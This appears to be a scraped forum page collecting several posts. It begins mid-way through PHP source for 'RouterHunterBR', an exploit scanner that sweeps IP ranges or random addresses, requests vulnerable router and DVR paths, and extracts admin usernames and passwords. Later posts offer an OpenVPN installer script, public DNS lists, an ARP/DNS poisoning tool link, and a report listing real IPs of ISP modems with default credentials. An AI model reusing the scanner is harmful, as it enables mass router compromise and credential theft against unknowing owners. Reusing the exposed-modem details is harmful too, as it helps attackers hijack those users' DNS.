$command['proxy'] : NULL; $params['range'] = not_isnull_empty($command['range']) ? __getRange($command['range']) : NULL; $params['op'] = NULL; $params['op'] = not_isnull_empty($params['range']) && !($params['rand']) && !not_isnull_empty($params['file']) ? 0 : $params['op']; $params['op'] = ($params['rand']) && !not_isnull_empty($params['range']) && !not_isnull_empty($params['file']) ? 1 : $params['op']; $params['op'] = not_isnull_empty($params['file']) && !($params['rand']) && !not_isnull_empty($params['range']) ? 2 : $params['op']; $params['line'] = "-------------------------------------------------------------\n"; #=============================================================================== function __plus() { ob_flush(); flush(); } //FILTRE USER PASS LG_DVR_LE6016D function __getUserPass($html) { $set = array(); $set['reg1'] = '/<name>(.*?)<\/name>/i'; $set['reg2'] = '/<pw>(.*?)<\/pw>/i'; if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) { preg_match_all($set['reg1'], $html, $set['user']); preg_match_all($set['reg2'], $html, $set['pass']); for ($i = 0; $i <= count($set['user']); $i++) { $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n"; } return $set['out']; } return FALSE; } //INFORMATION IP function __infoIP($ip) { __plus(); $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE); return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}"; } //VALIDATION VARIABLE function not_isnull_empty($value = NULL) { RETURN !is_null($value) && !empty($value) ? TRUE : FALSE; } //MENU BANNER function __banner($msg, $op = NULL) { system("command clear"); print_r(" \n{$_SESSION["c01"]} _____ {$_SESSION["c01"]} (_____) {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) {$_SESSION["c01"]} \ / {$_SESSION["c01"]} \ / {$_SESSION["c01"]} /=\ {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); (is_null($op)) ? exit() : NULL; } //CREATING FORMATTING IPS FOR BAND function __getRange($range) { $ip = explode('.', $range); if (is_array($ip) && count($ip) == 4) { $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); $ip[3] = (strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); return $ip; } else { return FALSE; } } //GENERATING IPS RANDOM function __getIPRandom() { $bloc1 = rand(0, 255); $bloc2 = rand(0, 255); $bloc3 = rand(0, 255); $bloc4 = rand(0, 255); $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; return $ip; } //OPENING FILE FILE IPS function __getIPFile($file) { if (isset($file) && !empty($file)) { $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); __plus(); if (is_array($resultIP)) { return ($resultIP); } } return FALSE; } //AGENT REQUEST RANDOM function __getUserAgentRandom() { //AGENT BROSER $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' ); //AGENT OPERATING SYSTEM $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' ); //AGENT LOCAL FAKE $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' ); return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ''; } //SEND REQUEST SERVER function __request($params) { $objcurl = curl_init(); $status = array(); curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); (!is_null($params['proxy']) ? curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl); __plus(); $server = curl_getinfo($objcurl); __plus(); //FILTERING SERVER INFORMATION preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); preg_match_all('(Server:.*)', $info['corpo'], $status['server']); preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); $info['dados_01'] = $server; $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); curl_close($objcurl); __plus(); return $info; } //SUB PROCESS function __subProcess($params, $target) { foreach ($params['exploit_model'] as $camp => $value) { $params['exploit'] = $value; $params['exploit_model'] = $camp; $params['host'] = $target; $rest = __request($params); __plus(); if ($rest['dados_01']['http_code'] != 0) { break; } } __plus(); $_SESSION["cont_ip"] ++; if ($rest['dados_01']['http_code'] == 200) { //FOUND FILE $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}"; echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; $output_view = "{$style_var} [ ! ]__[iNFO][COD]: {$rest['dados_01']['http_code']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][iP/FILE]: {$params['host']}{$params['exploit']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][MODEL]: {$params['exploit_model']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; $info_ip = __infoIP($rest['dados_01']['primary_ip']); $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); __plus(); } else { //FILE NOT FOUND echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; } echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"]; } function main($params) { //IMPLEMENTATION HOME echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); if ($params['op'] == 0) { //WORKING WITH IPS ON TRACK for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { __plus(); __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); __plus(); } } elseif ($params['op'] == 1) { //WORKING WITH IP RANDOM !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; for ($i = 0; $i <= $params['limit-ip']; $i++) { __subProcess($params, __getIPRandom()); __plus(); } } elseif ($params['op'] == 2) { //IP WORK SOURCE FILE !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; __plus(); foreach ($params['file'] as $value) { __subProcess($params, $value); __plus(); } } } //RUNNING ALL PROCESS main($params); Mirror Source
  11. Description Resolver is a windows based tool which designed to preform a reverse DNS Lookup for a given IP address or for a range of IP’s in order to find its PTR. Updated to Version 1.0.3 added dns records brute force. Download: Resolver | SourceForge.net
  12. There are many ways you can go about creating your own Virtual Private Network. Let’s do the easiest one in this tutorial which will be how to use your VPS as your own VPN for your main machines connection. – ro0ted What’s used in this tutorial? Digital Oceans Cloud Debian Server VPS Putty AIO Open Puttygen>Click Generate>move your mouse around the blank space. Then copy the public key to the clipboard, save the public/private key Go to digital ocean control panel click SSH Keys. Copy n paste the public key from Puttygen to Control Panel. Now open Putty. Now once you are in Auth, In RLogin enter Root. Now you can connect to your server without ever entering a key. Minimize this window go to Create Droplet to make your server. Edit yours how you want just make sure you don’t enable Ipv6. Debian is more stable than all of them. Click SSH Key before clicking create droplet. Then go to droplets left side menu. Copy n paste ip in droplets to your putty. Click open. Should work flawlessly. If it does ask for a pass phrase ex: Passphrase for RSA-Key”” that means you put phrase in puttygen. If it says password for root, you did something wrong. If you can set this VPN Server up through this tutorial then just throw your computer away because this is an Automatic Installation for you. There’s really nothing to explain. This script does everything for you. Is it the safest way? Probably not but the more IMPORTANT question should be who do you trust more with your logs? Once signed in. type: sudo apt-get dist-upgrade sudo apt-get upgrade sudo apt-get update wget http://git.io/vpn –no-check-certificate -O openvpn-install.sh; chmod +x openvpn-install.sh; mirror: #!/bin/bash# OpenVPN road warrior installer for Debian-based distros # This script will only work on Debian-based systems. It isn't bulletproof but # it will probably work if you simply want to setup a VPN on your Debian/Ubuntu # VPS. It has been designed to be as unobtrusive and universal as possible. if [[ "$USER" != 'root' ]]; then echo "Sorry, you need to run this as root" exit fi if [[ ! -e /dev/net/tun ]]; then echo "TUN/TAP is not available" exit fi if [[ ! -e /etc/debian_version ]]; then echo "Looks like you aren't running this installer on a Debian-based system" exit fi newclient () { # Generates the client.ovpn cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/$1.ovpn sed -i "/ca ca.crt/d" ~/$1.ovpn sed -i "/cert client.crt/d" ~/$1.ovpn sed -i "/key client.key/d" ~/$1.ovpn echo "<ca>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/ca.crt >> ~/$1.ovpn echo "</ca>" >> ~/$1.ovpn echo "<cert>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/$1.crt >> ~/$1.ovpn echo "</cert>" >> ~/$1.ovpn echo "<key>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/$1.key >> ~/$1.ovpn echo "</key>" >> ~/$1.ovpn } # Try to get our IP from the system and fallback to the Internet. # I do this to make the script compatible with NATed servers (lowendspirit.com) # and to avoid getting an IPv6. IP=$(ifconfig | grep 'inet addr:' | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -d: -f2 | awk '{ print $1}' | head -1) if [[ "$IP" = "" ]]; then IP=$(wget -qO- ipv4.icanhazip.com) fi if [[ -e /etc/openvpn/server.conf ]]; then while : do clear echo "Looks like OpenVPN is already installed" echo "What do you want to do?" echo "" echo "1) Add a cert for a new user" echo "2) Revoke existing user cert" echo "3) Remove OpenVPN" echo "4) Exit" echo "" read -p "Select an option [1-4]: " option case $option in 1) echo "" echo "Tell me a name for the client cert" echo "Please, use one word only, no special characters" read -p "Client name: " -e -i client CLIENT cd /etc/openvpn/easy-rsa/2.0/ source ./vars # build-key for the client export KEY_CN="$CLIENT" export EASY_RSA="${EASY_RSA:-.}" "$EASY_RSA/pkitool" $CLIENT # Generate the client.ovpn newclient "$CLIENT" echo "" echo "Client $CLIENT added, certs available at ~/$CLIENT.ovpn" exit ;; 2) echo "" echo "Tell me the existing client name" read -p "Client name: " -e -i client CLIENT cd /etc/openvpn/easy-rsa/2.0/ . /etc/openvpn/easy-rsa/2.0/vars . /etc/openvpn/easy-rsa/2.0/revoke-full $CLIENT # If it's the first time revoking a cert, we need to add the crl-verify line if grep -q "crl-verify" "/etc/openvpn/server.conf"; then echo "" echo "Certificate for client $CLIENT revoked" else echo "crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem" >> "/etc/openvpn/server.conf" /etc/init.d/openvpn restart echo "" echo "Certificate for client $CLIENT revoked" fi exit ;; 3) apt-get remove --purge -y openvpn openvpn-blacklist rm -rf /etc/openvpn rm -rf /usr/share/doc/openvpn sed -i '/--dport 53 -j REDIRECT --to-port/d' /etc/rc.local sed -i '/iptables -t nat -A POSTROUTING -s 10.8.0.0/d' /etc/rc.local echo "" echo "OpenVPN removed!" exit ;; 4) exit;; esac done else clear echo 'Welcome to this quick OpenVPN "road warrior" installer' echo "" # OpenVPN setup and first user creation echo "I need to ask you a few questions before starting the setup" echo "You can leave the default options and just press enter if you are ok with them" echo "" echo "First I need to know the IPv4 address of the network interface you want OpenVPN" echo "listening to." read -p "IP address: " -e -i $IP IP echo "" echo "What port do you want for OpenVPN?" read -p "Port: " -e -i 1194 PORT echo "" echo "Do you want OpenVPN to be available at port 53 too?" echo "This can be useful to connect under restrictive networks" read -p "Listen at port 53 [y/n]: " -e -i n ALTPORT echo "" echo "Do you want to enable internal networking for the VPN?" echo "This can allow VPN clients to communicate between them" read -p "Allow internal networking [y/n]: " -e -i n INTERNALNETWORK echo "" echo "What DNS do you want to use with the VPN?" echo " 1) Current system resolvers" echo " 2) OpenDNS" echo " 3) Level 3" echo " 4) NTT" echo " 5) Hurricane Electric" echo " 6) Yandex" read -p "DNS [1-6]: " -e -i 1 DNS echo "" echo "Finally, tell me your name for the client cert" echo "Please, use one word only, no special characters" read -p "Client name: " -e -i client CLIENT echo "" echo "Okay, that was all I needed. We are ready to setup your OpenVPN server now" read -n1 -r -p "Press any key to continue..." apt-get update apt-get install openvpn iptables openssl -y cp -R /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn # easy-rsa isn't available by default for Debian Jessie and newer if [[ ! -d /etc/openvpn/easy-rsa/2.0/ ]]; then wget --no-check-certificate -O ~/easy-rsa.tar.gz https://github.com/OpenVPN/easy-rsa/archive/2.2.2.tar.gz tar xzf ~/easy-rsa.tar.gz -C ~/ mkdir -p /etc/openvpn/easy-rsa/2.0/ cp ~/easy-rsa-2.2.2/easy-rsa/2.0/* /etc/openvpn/easy-rsa/2.0/ rm -rf ~/easy-rsa-2.2.2 rm -rf ~/easy-rsa.tar.gz fi cd /etc/openvpn/easy-rsa/2.0/ # Let's fix one thing first... cp -u -p openssl-1.0.0.cnf openssl.cnf # Fuck you NSA - 1024 bits was the default for Debian Wheezy and older sed -i 's|export KEY_SIZE=1024|export KEY_SIZE=2048|' /etc/openvpn/easy-rsa/2.0/vars # Create the PKI . /etc/openvpn/easy-rsa/2.0/vars . /etc/openvpn/easy-rsa/2.0/clean-all # The following lines are from build-ca. I don't use that script directly # because it's interactive and we don't want that. Yes, this could break # the installation script if build-ca changes in the future. export EASY_RSA="${EASY_RSA:-.}" "$EASY_RSA/pkitool" --initca $* # Same as the last time, we are going to run build-key-server export EASY_RSA="${EASY_RSA:-.}" "$EASY_RSA/pkitool" --server server # Now the client keys. We need to set KEY_CN or the stupid pkitool will cry export KEY_CN="$CLIENT" export EASY_RSA="${EASY_RSA:-.}" "$EASY_RSA/pkitool" $CLIENT # DH params . /etc/openvpn/easy-rsa/2.0/build-dh # Let's configure the server cd /usr/share/doc/openvpn/examples/sample-config-files gunzip -d server.conf.gz cp server.conf /etc/openvpn/ cd /etc/openvpn/easy-rsa/2.0/keys cp ca.crt ca.key dh2048.pem server.crt server.key /etc/openvpn cd /etc/openvpn/ # Set the server configuration sed -i 's|dh dh1024.pem|dh dh2048.pem|' server.conf sed -i 's|;push "redirect-gateway def1 bypass-dhcp"|push "redirect-gateway def1 bypass-dhcp"|' server.conf sed -i "s|port 1194|port $PORT|" server.conf # DNS case $DNS in 1) # Obtain the resolvers from resolv.conf and use them for OpenVPN grep -v '#' /etc/resolv.conf | grep 'nameserver' | grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | while read line; do sed -i "/;push \"dhcp-option DNS 208.67.220.220\"/a\push \"dhcp-option DNS $line\"" server.conf done ;; 2) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 208.67.222.222"|' server.conf sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 208.67.220.220"|' server.conf ;; 3) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 4.2.2.2"|' server.conf sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 4.2.2.4"|' server.conf ;; 4) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 129.250.35.250"|' server.conf sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 129.250.35.251"|' server.conf ;; 5) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 74.82.42.42"|' server.conf ;; 6) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 77.88.8.8"|' server.conf sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 77.88.8.1"|' server.conf ;; esac # Listen at port 53 too if user wants that if [[ "$ALTPORT" = 'y' ]]; then iptables -t nat -A PREROUTING -p udp -d $IP --dport 53 -j REDIRECT --to-port $PORT sed -i "1 a\iptables -t nat -A PREROUTING -p udp -d $IP --dport 53 -j REDIRECT --to-port $PORT" /etc/rc.local fi # Enable net.ipv4.ip_forward for the system sed -i 's|#net.ipv4.ip_forward=1|net.ipv4.ip_forward=1|' /etc/sysctl.conf # Avoid an unneeded reboot echo 1 > /proc/sys/net/ipv4/ip_forward # Set iptables if [[ "$INTERNALNETWORK" = 'y' ]]; then iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $IP sed -i "1 a\iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $IP" /etc/rc.local else iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to $IP sed -i "1 a\iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to $IP" /etc/rc.local fi # And finally, restart OpenVPN /etc/init.d/openvpn restart # Try to detect a NATed connection and ask about it to potential LowEndSpirit # users EXTERNALIP=$(wget -qO- ipv4.icanhazip.com) if [[ "$IP" != "$EXTERNALIP" ]]; then echo "" echo "Looks like your server is behind a NAT!" echo "" echo "If your server is NATed (LowEndSpirit), I need to know the external IP" echo "If that's not the case, just ignore this and leave the next field blank" read -p "External IP: " -e USEREXTERNALIP if [[ "$USEREXTERNALIP" != "" ]]; then IP=$USEREXTERNALIP fi fi # IP/port set on the default client.conf so we can add further users # without asking for them sed -i "s|remote my-server-1 1194|remote $IP $PORT|" /usr/share/doc/openvpn/examples/sample-config-files/client.conf # Generate the client.ovpn newclient "$CLIENT" echo "" echo "Finished!" echo "" echo "Your client config is available at ~/$CLIENT.ovpn" echo "If you want to add more clients, you simply need to run this script another time!" fi to begin auto installer type: ./openvpn-install.sh Now if your main machines windows open notepad. go back to putty type: cat ro0ted.ovpn copy all of it to clipboard paste it in notepad>File>Save as>WhateverYouNamedTheClient.ovpn Check if your OpenVPN server is running type: ps ax|grep openvpn You should see something like this: Traffic forwarding has to be enabled for the VPN connection to work. type: nano /etc/sysctl.conf and enable ipv4 forwarding by un-commenting the line “net.ipv4.ip_forward=0? removing the # sign and changing 0 to 1 so it looks like this: net.ipv4.ip_forward=1 ctrl + X Select Y enable masquerading in firewall type: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE Go to Windows Download Openvpn: http://openvpn.net/index.php/open-source/downloads.html After you install it, transfer the ovpn-client1.tar.gz archive to your PC and unpack it to your OpenVPN GUI’s config folder (usually in “C:\Program Files(x86)\OpenVPN\config\”) Start OpenVPN GUI with right click, Run as Administrator (it works only when you run it as administrator). Right click on its System Tray icon and click connect. Source
  13. Optimized for maximum speed you will not feel any delays when browsing the web access to an uncensored resolver free of charge. ipv4-DNS (No Logging, DNSSEC enabled) 84.200.70.4084.200.69.80 - - ipv6-DNS (No Logging, DNSSEC enabled) 2001:1608:10:25::9249:d69b2001:1608:10:25::1c04:b12f Source: [https://dns.watch ]
  14. De multe ori ( mai des in ultima vreme ) am intampinat problema "vitala" a Linux-ului : aceea a update-urilor prin repos. Nu stiu din ce cauza, ( Multi zic de la trecerea la IPv6 ) dar devenea stresant cand nu puteai sa faci update-uri la diferite programe etc. De aceea scriu acest mic tutorial Solutia dureaza mai putin de 1 min: System ? Preferences ? Network Connections Gasim conexiunea actuala ( cablu/wireless/etc) la care editam urmatoarele din tab-ul "IPv4 Settings": Method: Default este Automatic (DHCP) , inlocuim cu Automatic (DHCP) adresses only. Mai adaugam la DNS Servers : Google - 8.8.8.8, 8.8.4.4 si OpenDNS ( adaugand acestea mi-a rezolvat problema ) - 208.67.222.222, 208.67.220.220; Adaugati-le pe toate ( separate de virgula ) si ar trebuii sa mearga; PS:Mi-a mers pe RDS, nu stiu daca merge si pe alte retele ( Unele ISP-uri din state au restrictii la anumite dns-uri de ex.) **Fail title
  15. Hello Guys , I am looking for list of Public DNS server which like powerful one and I find a list like that : (powerful means that I like to have DNS server which should be fast ,reliable ,high speed and always available) but I want more, anybody has idea how can I find more? 4.2.2.4 216.52.65.1 216.83.236.227 216.54.2.10 216.250.190.144 216.215.19.4 216.211.191.9 8.8.8.8 216.211.191.3 64.136.173.5 64.136.164.77 64.135.2.250 37.143.9.90 68.87.85.102 68.87.78.134 85.38.28.86 85.38.28.84 91.218.228.249 91.186.192.3 91.185.6.10 91.185.2.10 I am looking forward to hearing from you guys Thank you so much Yohann
  16. ARPwner was released at BlackHat USA 2012 by Nicolas Trippar. It is a tool to do arp poisoning and dns poisoning attacks, with a simple gui and a plugin system to do filtering of the information gathered, also has a implementation of sslstrip and is coded 100% in python, so you can modify on your needs. DOWNLOAD: https://github.com/ntrippar/ARPwner
  17. Salut, ca idee, am dat peste o asa-zisa vulnerabilitate a userilor clicknet care ipotetic ar permite modificarea dns-ului fiecarui utilizator cu toate implicatiile. Problema nu este una de securitate, ci mai mult de proasta informare a clientiilor si sta in felul urmator: Orice client clicknet primeste un kit de instalare care contine un modem, cabluri si un manual de instalare. Toate bune si frumoase doar ca... modemurile cu porturi UTP/wireless (exceptie cele usb) vin din fabrica cu un user si o parola standard si cu o bresa majora de securitate - accesul la administrare online. In manualul de instalare (care a fost scris de maimute) nu numai ca nu sunt explicati corect pasii de instalare, ci sunt prezentate niste aberatii, dar niciunde nu scrie "Bai prostule schimba parola routerului sau dezactiveaza accesul online" astfel incat oricine acceseaza un ip de forma 89.120.xxx.xxx care este online are acces la toate setarile modemului ADSL inclusiv la schimbarea DNS-ului. Ce frumos ar pica companiei condusa de turci atunci cand de-o data toti clientii lor cand acceseaza www.google.com sunt redirectionati pe www.adultfriendfinder.com sau dumnezeu stie ce alta destinatie dubioasa. Nu de alta, dar este la indemana oricui sa scrie un script care acceseaza si modifica toate modemurile. Mai grav este ca utilizatorii nici n-au cea mai mica idee despre pericolul la care sunt expusi, eu afland asta cu stupoare dupa ce am instalat un server de p2p de proba iar cand am accesat ip-ul SURPRIZA!!! Mai grav este ca multe institutii de stat au internet de la clicknet .. sa vez atunci distractie si procese pe capul celor de la Romtelefon (personal sunt sigur ca cei de la consiliul local Arad au injurat mult acum cateva zile ). Cam atat... ah da.. si niste poze ca altfel nu se poate http://www.testeweb.com/rst/romtelefon/89.120.221.111.jpg http://www.testeweb.com/rst/romtelefon/89.120.221.140.jpg http://www.testeweb.com/rst/romtelefon/89.120.221.19.jpg http://www.testeweb.com/rst/romtelefon/89.120.221.3.jpg http://www.testeweb.com/rst/romtelefon/89.120.221.40.jpg http://www.testeweb.com/rst/romtelefon/89.120.221.49.jpg din 200 de ip-uri testate, DOAR 12 aveau parola schimbata intre timp am mai uploadat niste poze plus cateva "surprize" pentru cine e curios http://www.testeweb.com/rst/romtelefon/
×
×
  • Create New...